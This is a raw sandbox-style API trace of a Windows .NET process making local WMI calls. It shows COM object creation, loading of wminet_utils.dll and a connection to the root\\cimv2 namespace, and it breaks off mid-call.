[0251.321] WbemDefPath:IUnknown:Release (This=0x2261daa8) returned 0x2 [0251.322] WbemDefPath:IUnknown:Release (This=0x22620fa0) returned 0x0 [0251.323] WbemDefPath:IUnknown:Release (This=0x2261daa8) returned 0x1 [0251.324] SetEvent (hEvent=0x724) returned 1 [0251.379] GetLastError () returned 0x36b7 [0268.546] CoGetClassObject (in: rclsid=0x1f8421e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7342a3b0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2281ed5c | out: ppv=0x2281ed5c*=0x2261dc98) returned 0x0 [0268.547] WbemDefPath:IUnknown:QueryInterface (in: This=0x2261dc98, riid=0x73517ecc*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x2281eb8c | out: ppvObject=0x2281eb8c*=0x0) returned 0x80004002 [0268.548] WbemDefPath:IClassFactory:CreateInstance (in: This=0x2261dc98, pUnkOuter=0x0, riid=0x734a7714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2281ebc4 | out: ppvObject=0x2281ebc4*=0x2261dca8) returned 0x0 [0268.548] WbemDefPath:IUnknown:QueryInterface (in: This=0x2261dca8, riid=0x734a7714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2281e968 | out: ppvObject=0x2281e968*=0x2261dca8) returned 0x0 [0268.558] WbemDefPath:IUnknown:QueryInterface (in: This=0x2261dca8, riid=0x734c4204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x2281e924 | out: ppvObject=0x2281e924*=0x0) returned 0x80004002 [0268.573] WbemDefPath:IUnknown:AddRef (This=0x2261dca8) returned 0x3 [0268.574] CoGetContextToken (in: pToken=0x2281e7b0 | out: pToken=0x2281e7b0) returned 0x0 [0268.574] WbemDefPath:IUnknown:QueryInterface (in: This=0x2261dca8, riid=0x733a23cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2281e798 | out: ppvObject=0x2281e798*=0x1f843db0) returned 0x0 [0268.575] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1f843db0, riid=0x734a7714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x2281e7a0 | out: pCid=0x2281e7a0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0268.575] WbemDefPath:IUnknown:Release (This=0x1f843db0) returned 0x3 [0268.581] CoGetContextToken (in: pToken=0x2281e7a8 | out: pToken=0x2281e7a8) returned 0x0 [0268.582] WbemDefPath:IUnknown:AddRef (This=0x2261dca8) returned 0x4 [0268.582] WbemDefPath:IUnknown:QueryInterface (in: This=0x2261dca8, riid=0x733f767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2281e81c | out: ppvObject=0x2281e81c*=0x0) returned 0x80004002 [0268.583] WbemDefPath:IUnknown:Release (This=0x2261dca8) returned 0x3 [0268.592] WbemDefPath:IUnknown:Release (This=0x2261dca8) returned 0x2 [0268.593] WbemDefPath:IUnknown:Release (This=0x2261dc98) returned 0x0 [0268.593] WbemDefPath:IUnknown:Release (This=0x2261dca8) returned 0x1 [0268.594] SetEvent (hEvent=0x768) returned 1 [0268.606] GetLastError () returned 0x36b7 [0272.108] CoGetClassObject (in: rclsid=0x1f8421e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7342a3b0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2281ed5c | out: ppv=0x2281ed5c*=0x2261dc98) returned 0x0 [0272.109] WbemDefPath:IUnknown:QueryInterface (in: This=0x2261dc98, riid=0x73517ecc*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x2281eb8c | out: ppvObject=0x2281eb8c*=0x0) returned 0x80004002 [0272.110] WbemDefPath:IClassFactory:CreateInstance (in: This=0x2261dc98, pUnkOuter=0x0, riid=0x734a7714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2281ebc4 | out: ppvObject=0x2281ebc4*=0x2261e1b8) returned 0x0 [0272.111] WbemDefPath:IUnknown:QueryInterface (in: This=0x2261e1b8, riid=0x734a7714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2281e968 | out: ppvObject=0x2281e968*=0x2261e1b8) returned 0x0 [0272.121] WbemDefPath:IUnknown:QueryInterface (in: This=0x2261e1b8, riid=0x734c4204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x2281e924 | out: ppvObject=0x2281e924*=0x0) returned 0x80004002 [0272.135] WbemDefPath:IUnknown:AddRef (This=0x2261e1b8) returned 0x3 [0272.136] CoGetContextToken (in: pToken=0x2281e7b0 | out: pToken=0x2281e7b0) returned 0x0 [0272.136] WbemDefPath:IUnknown:QueryInterface (in: This=0x2261e1b8, riid=0x733a23cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2281e798 | out: ppvObject=0x2281e798*=0x1f843e60) returned 0x0 [0272.138] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1f843e60, riid=0x734a7714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x2281e7a0 | out: pCid=0x2281e7a0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0272.138] WbemDefPath:IUnknown:Release (This=0x1f843e60) returned 0x3 [0272.143] CoGetContextToken (in: pToken=0x2281e7a8 | out: pToken=0x2281e7a8) returned 0x0 [0272.144] WbemDefPath:IUnknown:AddRef (This=0x2261e1b8) returned 0x4 [0272.144] WbemDefPath:IUnknown:QueryInterface (in: This=0x2261e1b8, riid=0x733f767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2281e81c | out: ppvObject=0x2281e81c*=0x0) returned 0x80004002 [0272.145] WbemDefPath:IUnknown:Release (This=0x2261e1b8) returned 0x3 [0272.154] WbemDefPath:IUnknown:Release (This=0x2261e1b8) returned 0x2 [0272.155] WbemDefPath:IUnknown:Release (This=0x2261dc98) returned 0x0 [0272.156] WbemDefPath:IUnknown:Release (This=0x2261e1b8) returned 0x1 [0272.157] SetEvent (hEvent=0x770) returned 1 [0272.203] GetLastError () returned 0x36b7 Thread: id = 72 os_tid = 0x95c [0251.768] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0251.821] IIDFromString (in: lpsz="{4590F811-1D3A-11D0-891F-00AA004B2E24}", lpiid=0x2245f160 | out: lpiid=0x2245f160) returned 0x0 [0251.838] CoGetClassObject (in: rclsid=0x1f8423c4*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x7342a3b0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2245f0c8 | out: ppv=0x2245f0c8*=0x2261dc40) returned 0x0 [0251.840] WbemLocator:IUnknown:QueryInterface (in: This=0x2261dc40, riid=0x73517ecc*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x2245eef8 | out: ppvObject=0x2245eef8*=0x0) returned 0x80004002 [0251.841] WbemLocator:IClassFactory:CreateInstance (in: This=0x2261dc40, pUnkOuter=0x0, riid=0x734a7714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2245ef30 | out: ppvObject=0x2245ef30*=0x22620fd8) returned 0x0 [0251.842] WbemLocator:IUnknown:QueryInterface (in: This=0x22620fd8, riid=0x734a7714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2245ecd4 | out: ppvObject=0x2245ecd4*=0x22620fd8) returned 0x0 [0251.852] WbemLocator:IUnknown:QueryInterface (in: This=0x22620fd8, riid=0x734c4204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x2245ec90 | out: ppvObject=0x2245ec90*=0x0) returned 0x80004002 [0251.870] WbemLocator:IUnknown:AddRef (This=0x22620fd8) returned 0x3 [0251.871] CoGetContextToken (in: pToken=0x2245eb1c | out: pToken=0x2245eb1c) returned 0x0 [0251.871] WbemLocator:IUnknown:QueryInterface (in: This=0x22620fd8, riid=0x733a23cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2245eb04 | out: ppvObject=0x2245eb04*=0x0) returned 0x80004002 [0251.877] CoGetContextToken (in: pToken=0x2245eb14 | out: pToken=0x2245eb14) returned 0x0 [0251.878] WbemLocator:IUnknown:AddRef (This=0x22620fd8) returned 0x4 [0251.878] WbemLocator:IUnknown:QueryInterface (in: This=0x22620fd8, riid=0x733f767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2245eb88 | out: ppvObject=0x2245eb88*=0x0) returned 0x80004002 [0251.879] WbemLocator:IUnknown:Release (This=0x22620fd8) returned 0x3 [0251.889] WbemLocator:IUnknown:Release (This=0x22620fd8) returned 0x2 [0251.890] WbemLocator:IUnknown:Release (This=0x2261dc40) returned 0x0 [0251.891] WbemLocator:IUnknown:Release (This=0x22620fd8) returned 0x1 [0251.893] CoGetContextToken (in: pToken=0x2245f020 | out: pToken=0x2245f020) returned 0x0 [0251.896] CoGetContextToken (in: pToken=0x2245efe0 | out: pToken=0x2245efe0) returned 0x0 [0251.897] WbemLocator:IUnknown:AddRef (This=0x22620fd8) returned 0x2 [0251.897] WbemLocator:IUnknown:QueryInterface (in: This=0x22620fd8, riid=0x2245f05c*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x2245f058 | out: ppvObject=0x2245f058*=0x22620fd8) returned 0x0 [0251.898] WbemLocator:IUnknown:Release (This=0x22620fd8) returned 0x2 [0251.899] WbemLocator:IUnknown:Release (This=0x22620fd8) returned 0x1 [0252.424] CoGetContextToken (in: pToken=0x2245f09c | out: pToken=0x2245f09c) returned 0x0 [0252.424] CoGetContextToken (in: pToken=0x2245f05c | out: pToken=0x2245f05c) returned 0x0 [0252.425] WbemDefPath:IUnknown:AddRef (This=0x2261daa8) returned 0x2 [0252.425] WbemDefPath:IUnknown:QueryInterface (in: This=0x2261daa8, riid=0x2245f0d8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x2245f0d4 | out: ppvObject=0x2245f0d4*=0x2261daa8) returned 0x0 [0252.427] WbemDefPath:IUnknown:Release (This=0x2261daa8) returned 0x2 [0252.429] WbemDefPath:IUnknown:AddRef (This=0x2261daa8) returned 0x3 [0252.437] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x2261daa8, puCount=0x2245f250 | out: puCount=0x2245f250*=0x2) returned 0x0 [0252.437] WbemDefPath:IUnknown:Release (This=0x2261daa8) returned 0x2 [0252.440] WbemDefPath:IWbemPath:GetText (in: This=0x2261daa8, lFlags=8, puBuffLength=0x2245f24c*=0x0, pszText=0x0 | out: puBuffLength=0x2245f24c*=0xf, pszText=0x0) returned 0x0 [0252.442] WbemDefPath:IWbemPath:GetText (in: This=0x2261daa8, lFlags=8, puBuffLength=0x2245f24c*=0xf, pszText="00000000000000" | out: puBuffLength=0x2245f24c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0253.917] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\", nBufferLength=0x105, lpBuffer=0x2245e3f8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\", lpFilePart=0x0) returned 0x2e [0253.917] GetLastError () returned 0x0 [0254.041] LoadLibraryA (lpLibFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\\\wminet_utils.dll") returned 0x6a310000 [0254.534] GetProcAddress (hModule=0x6a310000, lpProcName="ResetSecurity") returned 0x6a311944 [0254.733] GetProcAddress (hModule=0x6a310000, lpProcName="SetSecurity") returned 0x6a311986 [0254.917] GetProcAddress (hModule=0x6a310000, lpProcName="BlessIWbemServices") returned 0x6a3119cc [0255.090] GetProcAddress (hModule=0x6a310000, lpProcName="BlessIWbemServicesObject") returned 0x6a311a1e [0255.292] GetProcAddress (hModule=0x6a310000, lpProcName="GetPropertyHandle") returned 0x6a311a70 [0255.493] GetProcAddress (hModule=0x6a310000, lpProcName="WritePropertyValue") returned 0x6a311a89 [0255.718] GetProcAddress (hModule=0x6a310000, lpProcName="Clone") returned 0x6a311aa2 [0255.965] GetProcAddress (hModule=0x6a310000, lpProcName="VerifyClientKey") returned 0x6a312270 [0256.298] GetProcAddress (hModule=0x6a310000, lpProcName="GetQualifierSet") returned 0x6a311d73 [0256.711] GetProcAddress (hModule=0x6a310000, lpProcName="Get") returned 0x6a311b96 [0256.977] GetProcAddress (hModule=0x6a310000, lpProcName="Put") returned 0x6a311b7a [0257.282] GetProcAddress (hModule=0x6a310000, lpProcName="Delete") returned 0x6a311bb5 [0257.564] GetProcAddress (hModule=0x6a310000, lpProcName="GetNames") returned 0x6a311bc8 [0257.791] GetProcAddress (hModule=0x6a310000, lpProcName="BeginEnumeration") returned 0x6a311be4 [0257.949] GetProcAddress (hModule=0x6a310000, lpProcName="Next") returned 0x6a311bf7 [0258.156] GetProcAddress (hModule=0x6a310000, lpProcName="EndEnumeration") returned 0x6a311c16 [0258.448] GetProcAddress (hModule=0x6a310000, lpProcName="GetPropertyQualifierSet") returned 0x6a311c26 [0258.729] GetProcAddress (hModule=0x6a310000, lpProcName="Clone") returned 0x6a311aa2 [0258.771] GetProcAddress (hModule=0x6a310000, lpProcName="GetObjectText") returned 0x6a311c3c [0258.994] GetProcAddress (hModule=0x6a310000, lpProcName="SpawnDerivedClass") returned 0x6a311c52 [0259.196] GetProcAddress (hModule=0x6a310000, lpProcName="SpawnInstance") returned 0x6a311c68 [0259.546] GetProcAddress (hModule=0x6a310000, lpProcName="CompareTo") returned 0x6a311c7e [0259.829] GetProcAddress (hModule=0x6a310000, lpProcName="GetPropertyOrigin") returned 0x6a311c94 [0260.008] GetProcAddress (hModule=0x6a310000, lpProcName="InheritsFrom") returned 0x6a311caa [0260.271] GetProcAddress (hModule=0x6a310000, lpProcName="GetMethod") returned 0x6a311cbd [0260.683] GetProcAddress (hModule=0x6a310000, lpProcName="PutMethod") returned 0x6a311cd9 [0261.345] GetProcAddress (hModule=0x6a310000, lpProcName="DeleteMethod") returned 0x6a311cf5 [0261.696] GetProcAddress (hModule=0x6a310000, lpProcName="BeginMethodEnumeration") returned 0x6a311d08 [0261.989] GetProcAddress (hModule=0x6a310000, lpProcName="NextMethod") returned 0x6a311d1b [0262.281] GetProcAddress (hModule=0x6a310000, lpProcName="EndMethodEnumeration") returned 0x6a311d37 [0262.533] GetProcAddress (hModule=0x6a310000, lpProcName="GetMethodQualifierSet") returned 0x6a311d47 [0262.877] GetProcAddress (hModule=0x6a310000, lpProcName="GetMethodOrigin") returned 0x6a311d5d [0263.129] GetProcAddress (hModule=0x6a310000, lpProcName="QualifierSet_Get") returned 0x6a311d86 [0263.372] GetProcAddress (hModule=0x6a310000, lpProcName="QualifierSet_Put") returned 0x6a311da2 [0263.607] GetProcAddress (hModule=0x6a310000, lpProcName="QualifierSet_Delete") returned 0x6a311dbb [0263.852] GetProcAddress (hModule=0x6a310000, lpProcName="QualifierSet_GetNames") returned 0x6a311dce [0264.124] GetProcAddress (hModule=0x6a310000, lpProcName="QualifierSet_BeginEnumeration") returned 0x6a311de4 [0264.412] GetProcAddress (hModule=0x6a310000, lpProcName="QualifierSet_Next") returned 0x6a311df7 [0264.701] GetProcAddress (hModule=0x6a310000, lpProcName="QualifierSet_EndEnumeration") returned 0x6a311e13 [0264.949] GetProcAddress (hModule=0x6a310000, lpProcName="GetCurrentApartmentType") returned 0x6a311d73 [0265.188] GetProcAddress (hModule=0x6a310000, lpProcName="GetDemultiplexedStub") returned 0x6a3118fd [0265.346] GetProcAddress (hModule=0x6a310000, lpProcName="CreateInstanceEnumWmi") returned 0x6a311580 [0265.514] GetProcAddress (hModule=0x6a310000, lpProcName="CreateClassEnumWmi") returned 0x6a3115f6 [0265.689] GetProcAddress (hModule=0x6a310000, lpProcName="ExecQueryWmi") returned 0x6a31169e [0265.897] GetProcAddress (hModule=0x6a310000, lpProcName="ExecNotificationQueryWmi") returned 0x6a311717 [0266.047] GetProcAddress (hModule=0x6a310000, lpProcName="PutInstanceWmi") returned 0x6a311790 [0266.190] GetProcAddress (hModule=0x6a310000, lpProcName="PutClassWmi") returned 0x6a311810 [0266.364] GetProcAddress (hModule=0x6a310000, lpProcName="CloneEnumWbemClassObject") returned 0x6a311890 [0266.549] GetProcAddress (hModule=0x6a310000, lpProcName="ConnectServerWmi") returned 0x6a3124b7 [0266.833] CoCreateInstance (in: rclsid=0x6a3113a0*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x6a3112d0*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x2245ed28 | out: ppv=0x2245ed28*=0x2261dc58) returned 0x0 [0266.835] WbemLocator:IWbemLocator:ConnectServer (in: This=0x2261dc58, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x2245ed74 | out: ppNamespace=0x2245ed74*=0x2261dd7c) returned 0x0 [0267.080] WbemLocator:IUnknown:QueryInterface (in: This=0x2261dd7c, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2245ec44 | out: ppvObject=0x2245ec44*=0x1f83e64c) returned 0x0 [0267.080] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x1f83e64c, pProxy=0x2261dd7c, pAuthnSvc=0x2245ec8c, pAuthzSvc=0x2245ec88, pServerPrincName=0x2245ec98, pAuthnLevel=0x2245ec90, pImpLevel=0x2245ec7c, pAuthInfo=0x2245ec80, pCapabilites=0x2245ec84 | out: pAuthnSvc=0x2245ec8c*=0xa, pAuthzSvc=0x2245ec88*=0x0, pServerPrincName=0x2245ec98, pAuthnLevel=0x2245ec90*=0x6, pImpLevel=0x2245ec7c*=0x2, pAuthInfo=0x2245ec80, pCapabilites=0x2245ec84*=0x1) returned 0x0 [0267.081] WbemLocator:IUnknown:Release (This=0x1f83e64c) returned 0x1 [0267.081] WbemLocator:IUnknown:QueryInterface (in: This=0x2261dd7c, riid=0x6a311250*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2245ec38 | out: ppvObject=0x2245ec38*=0x1f83e66c) returned 0x0 [0267.081] WbemLocator:IUnknown:QueryInterface (in: This=0x2261dd7c, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2245ec34 | out: ppvObject=0x2245ec34*=0x1f83e64c) returned 0x0 [0267.082] WbemLocator:IClientSecurity:SetBlanket (This=0x1f83e64c, pProxy=0x2261dd7c, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0267.083] WbemLocator:IUnknown:Release (This=0x1f83e64c) returned 0x2 [0267.083] WbemLocator:IUnknown:Release (This=0x1f83e66c) returned 0x1 [0267.083] CoTaskMemFree (pv=0x1f845cf8) [0267.084] WbemLocator:IUnknown:Release (This=0x2261dc58) returned 0x0 [0267.085] WbemLocator:IUnknown:QueryInterface (in: This=0x2261dd7c, riid=0x734a7714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2245e5f4 | out: ppvObject=0x2245e5f4*=0x1f83e66c) returned 0x0 [0267.098] WbemLocator:IUnknown:QueryInterface (in: This=0x1f83e66c, riid=0x734c4204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x2245e5b0 | out: ppvObject=0x2245e5b0*=0x0) returned 0x80004002 [0267.100] WbemLocator:IUnknown:QueryInterface (in: This=0x1f83e66c, riid=0x733f0b9c*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x2245e4a4 | out: ppvObject=0x2245e4a4*=0x0) returned 0x80004002 [0267.122] WbemLocator:IUnknown:AddRef (This=0x1f83e66c) returned 0x3 [0267.122] CoGetContextToken (in: pToken=0x2245e43c | out: pToken=0x2245e43c) returned 0x0 [0267.122] WbemLocator:IUnknown:QueryInterface (in: This=0x1f83e66c, riid=0x733a23cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2245e424 | out: ppvObject=0x2245e424*=0x1f83e5cc) returned 0x0 [0267.124] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x1f83e5cc, riid=0x734a7714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x2245e42c | out: pCid=0x2245e42c*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0267.124] WbemLocator:IUnknown:Release (This=0x1f83e5cc) returned 0x3 [0267.131] CoGetContextToken (in: pToken=0x2245e434 | out: pToken=0x2245e434) returned 0x0 [0267.131] WbemLocator:IUnknown:AddRef (This=0x1f83e66c) returned 0x4 [0267.132] WbemLocator:IUnknown:QueryInterface (in: This=0x1f83e66c, riid=0x733f767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2245e4a8 | out: ppvObject=0x2245e4a8*=0x1f83e654) returned 0x0 [0267.133] WbemLocator:IUnknown:Release (This=0x1f83e66c) returned 0x4 [0267.134] WbemLocator:IRpcOptions:Query (in: This=0x1f83e654, pPrx=0x1f83e66c, dwProperty=2, pdwValue=0x2245e4cc | out: pdwValue=0x2245e4cc) returned 0x80004002 [0267.135] WbemLocator:IUnknown:Release (This=0x1f83e654) returned 0x3 [0267.148] WbemLocator:IUnknown:Release (This=0x1f83e66c) returned 0x2 [0267.149] CoGetContextToken (in: pToken=0x2245e8a8 | out: pToken=0x2245e8a8) returned 0x0 [0267.149] CoGetContextToken (in: pToken=0x2245e868 | out: pToken=0x2245e868) returned 0x0 [0267.149] WbemLocator:IUnknown:AddRef (This=0x1f83e66c) returned 0x3 [0267.150] WbemLocator:IUnknown:QueryInterface (in: This=0x1f83e66c, riid=0x2245e8e4*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x2245e8e0 | out: ppvObject=0x2245e8e0*=0x2261dd7c) returned 0x0 [0267.151] WbemLocator:IUnknown:Release (This=0x1f83e66c) returned 0x3 [0267.152] WbemLocator:IUnknown:Release (This=0x2261dd7c) returned 0x2 [0267.152] WbemLocator:IUnknown:Release (This=0x2261dd7c) returned 0x1 [0267.166] CoUninitialize () Thread: id = 73 os_tid = 0x98c Thread: id = 74 os_tid = 0x99c [0267.433] CoGetContextToken (in: pToken=0x2245f378 | out: pToken=0x2245f378) returned 0x0 [0267.434] CoGetContextToken (in: pToken=0x2245f368 | out: pToken=0x2245f368) returned 0x0 [0267.434] CoGetMarshalSizeMax (in: pulSize=0x2245f334, riid=0x734a7714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnk=0x1f83e66c, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0 | out: pulSize=0x2245f334) returned 0x0 [0267.444] CoMarshalInterface (pStm=0x1f842578, riid=0x734a7714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, 